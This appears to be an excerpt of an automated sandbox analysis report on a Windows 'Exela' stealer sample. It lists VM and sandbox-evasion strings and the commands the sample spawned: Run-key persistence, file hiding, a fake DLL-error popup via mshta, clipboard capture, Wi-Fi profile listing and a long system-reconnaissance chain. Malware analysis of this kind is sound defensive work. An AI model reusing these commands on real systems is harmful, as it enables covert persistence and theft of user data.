            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b'VMware'
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"p2
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe04
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exepD
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmware"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 'qemu'
            Source: sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServiceVacSvcUpdate Orchestrator ServiceU
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe"
            Source: sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicheartbeat
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicvss
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: svchost.exe, 0000003B.00000002.2894003086.000001B77262B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"@
            Source: NETSTAT.EXE, 0000004D.00000002.1789561551.0000016B17F99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicshutdown
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe01
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
            Source: sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WLAN AutoConfigWlanSvcWindows Insider ServicewisvcWindows Remote Management (WS-Management)WinRMWindows Management InstrumentationWinmgmtWinHTTP Web Proxy Auto-Discovery ServiceWinHttpAutoProxySvcMicrosoft Defender Antivirus ServiceWinDefendStill Image Acquisition EventsWiaRpcWi-Fi Direct Services Connection Manager ServiceWFDSConMgrSvcWindows Error Reporting ServiceWerSvcProblem Reports Control Panel SupportwercplsupportWindows Encryption Provider Host ServiceWEPHOSTSVCWindows Event CollectorWecsvcWebClientWebClientMicrosoft Defender Antivirus Network Inspection ServiceWdNisSvcDiagnostic System HostWdiSystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeHyper-V Heartbeat Servicevmicheartbeat
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"P+
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe05
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmacthlp.exe", # VMware
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exep3
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if b'VMware' in stdout:
            Source: HOSTNAME.EXE, 00000039.00000002.1748389262.000001AF608A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72AA8B1B8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA940D0 GetProcessHeap,0_2_00007FF72AA940D0
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72AA8B1B8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA7C88C SetUnhandledExceptionFilter,0_2_00007FF72AA7C88C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA7C6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72AA7C6AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA7BE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF72AA7BE20
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,81_2_00007FF6E3A7B1B8
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A6C88C SetUnhandledExceptionFilter,81_2_00007FF6E3A6C88C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A6C6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,81_2_00007FF6E3A6C6AC
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A6BE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,81_2_00007FF6E3A6BE20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA9A420 cpuid 0_2_00007FF72AA9A420
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformationJump to behavior
